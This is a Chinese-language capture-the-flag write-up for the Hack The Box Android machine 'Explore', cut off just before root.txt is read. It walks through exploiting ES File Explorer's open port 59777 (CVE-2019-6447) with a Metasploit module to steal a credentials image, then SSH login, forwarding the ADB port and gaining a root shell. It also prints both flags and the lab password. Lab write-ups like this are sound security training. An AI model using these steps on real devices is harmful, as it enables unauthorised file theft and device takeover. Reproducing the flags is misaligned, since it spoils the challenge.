目录
1.Which port is being used by the ES File Explorer application?
2.What 2019 CVE ID is ES File Explorer vulnerable to?
3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.
4.What is the password for user kristi on the box?
5.Submit the flag located in /storage/emulated/0/.
USER_FLAG:f32017174c7c7e8f50c6da52891ae250
6.Which port is being filtered by the firewall?
7.What is the standard Google-provided command line tool for interacting with Android debug?
8.Submit the flag located in /data/.
ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5
连接至HTB服务器并启动靶机
靶机IP:10.10.10.247
分配IP:10.10.16.7
1.Which port is being used by the ES File Explorer application?
使用nmap对靶机进行全扫描
nmap -p- -A 10.10.10.247
由扫描可见,42135端口托管着ES File Explorer应用程序填上去也不知道为啥不对,反正正确答案是59777
2.What 2019 CVE ID is ES File Explorer vulnerable to?
直接使用searchsploit搜索ES File Explorer
searchsploit ES File Explorer
将该EXP拷贝到当前目录下
searchsploit -m 50070.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 50070.py
Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50070
Path: /usr/share/exploitdb/exploits/android/remote/50070.py
Codes: CVE-2019-6447
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/50070.py
漏洞编号:CVE-2019-6447
3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.
启动Metasploit
msfconsole
直接搜索ES File Explorer相关模块
search ES File Explorer
该模块完整名:auxiliary/scanner/http/es_file_explorer_open_port
4.What is the password for user kristi on the box?
切换到该模块
use auxiliary/scanner/http/es_file_explorer_open_port
列出该模块所有可填选项
show options
列出该模块所有可选动作
show actions
这里将action设置成LISTPICS以列出该设备所有照片
set action LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS
action => LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run[+] 10.10.10.247:59777
concept.jpg (135.33 KB) - 4/21/21 02:38:08 AM: /storage/emulated/0/DCIM/concept.jpg
anc.png (6.24 KB) - 4/21/21 02:37:50 AM: /storage/emulated/0/DCIM/anc.png
creds.jpg (1.14 MB) - 4/21/21 02:38:18 AM: /storage/emulated/0/DCIM/creds.jpg
224_anc.png (124.88 KB) - 4/21/21 02:37:21 AM: /storage/emulated/0/DCIM/224_anc.png[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
尝试取出文件:/storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE
action => GETFILE
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg
ACTIONITEM => /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run[+] 10.10.10.247:59777 - /storage/emulated/0/DCIM/creds.jpg saved to /root/.msf4/loot/20241110084132_default_10.10.10.247_getFile_945793.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
账户:kristi
密码:Kr1sT!5h@Rp3xPl0r3!
5.Submit the flag located in /storage/emulated/0/
.
使用上文凭证通过SSH服务登录到靶机(连接不上的检查密码是不是写错了,特别是大小写)
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa
Password authentication
:/ $ whoami
u0_a76
进入/storage/emulated/0/目录下
cd /storage/emulated/0/
查看user.txt内容
cat user.txt
:/ $ cd /storage/emulated/0/
:/storage/emulated/0 $ ls
Alarms DCIM Movies Notifications Podcasts backups user.txt
Android Download Music Pictures Ringtones dianxinos
:/storage/emulated/0 $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
USER_FLAG:f32017174c7c7e8f50c6da52891ae250
6.Which port is being filtered by the firewall?
查看靶机网络连接
ss -tlnp
开始我们用nmap对靶机进行过端口扫描,其中5555端口显示为过滤
7.What is the standard Google-provided command line tool for interacting with Android debug?
用于与安卓调试交互的谷歌标准命令行工具是ADB(Android Debug Bridge)。它可以让开发者在电脑上通过命令行对安卓设备进行多种操作,比如安装和卸载应用、获取设备信息、在设备和电脑之间传输文件等。
8.Submit the flag located in /data/
.
将靶机5555端口通过SSH服务转发到本地6666端口上
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa -N -L 6666:localhost:5555
通过adb连接到设备
adb connect 127.0.0.1:6666
查看已连接的设备
adb devices
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# adb devices
List of devices attached
127.0.0.1:6666 device
emulator-5554 device
设置以root身份连接至设备
adb -s 127.0.0.1:6666 root
连接至设备终端
adb -s 127.0.0.1:6666 shell
寻找root.txt并查看其内容